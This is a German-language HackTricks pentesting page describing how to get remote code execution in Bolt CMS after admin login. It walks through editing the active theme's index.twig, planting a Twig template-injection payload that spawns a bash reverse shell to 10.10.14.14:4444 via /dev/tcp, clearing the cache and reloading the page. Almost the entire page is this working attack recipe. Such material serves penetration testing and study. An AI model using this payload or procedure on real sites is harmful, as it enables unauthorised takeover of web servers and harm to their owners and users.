hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

3.7 KiB

Bolt CMS

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

RCE

Nach dem Einloggen als Administrator (gehen Sie zu /bot, um den Anmeldehinweis zu erhalten), können Sie RCE in Bolt CMS erhalten:

  • Wählen Sie Konfiguration -> Konfiguration anzeigen -> Hauptkonfiguration oder gehen Sie zum URL-Pfad /bolt/file-edit/config?file=/bolt/config.yaml
  • Überprüfen Sie den Wert des Themas
  • Wählen Sie Dateiverwaltung -> Vorlagen anzeigen & bearbeiten
  • Wählen Sie die im vorherigen Schritt gefundene Basis des Themas aus (base-2021 in diesem Fall) und wählen Sie index.twig
  • In meinem Fall befindet sich dies im URL-Pfad /bolt/file-edit/themes?file=/base-2021/index.twig
  • Setzen Sie Ihr Payload in diese Datei über Template-Injection (Twig), z.B.: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Und speichern Sie die Änderungen
  • Löschen Sie den Cache unter Wartung -> Cache leeren
  • Greifen Sie erneut als regulärer Benutzer auf die Seite zu, und das Payload sollte ausgeführt werden
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: